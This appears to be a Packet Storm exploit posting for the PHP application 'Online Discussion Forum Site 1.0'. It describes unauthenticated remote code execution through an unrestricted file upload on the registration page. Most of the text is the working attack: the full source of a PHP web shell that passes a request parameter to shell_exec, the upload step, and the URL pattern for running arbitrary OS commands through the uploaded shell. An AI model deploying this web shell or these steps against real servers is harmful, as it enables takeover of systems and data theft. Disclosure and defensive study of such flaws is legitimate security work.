Online Discussion Forum Site version 1.0 suffers from a remote code execution vulnerability.
ea586a27eb02fa39a4fd1a1dcfa0e3c62879ba0256ca8bfaf808b8fd2aa7e17f# Exploit Title: Online Discussion Forum Site 1.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-05-24
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
# Version: 1.0 (REQUIRED)
# Tested on: Windows 10 / Wamp Server
# CVE : N/A
Go to http://localhost/Online%20Discussion%20Forum%20Site/register.php register page to sign up
Then fill other fields and upload the shell.php with following PHP-shell-code
<?php
$command = shell_exec($_REQUEST['cmd']);
echo $command;
?>
After the registration process is completed go to the following page and execute the os command via uploaded shell
http://localhost/Online%20Discussion%20Forum%20Site/ups/shell.php?cmd=$THECODE-YOU-WANT-TO-EXECUTE
Any unauthenticated attacker is able to execute arbitrary os command
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed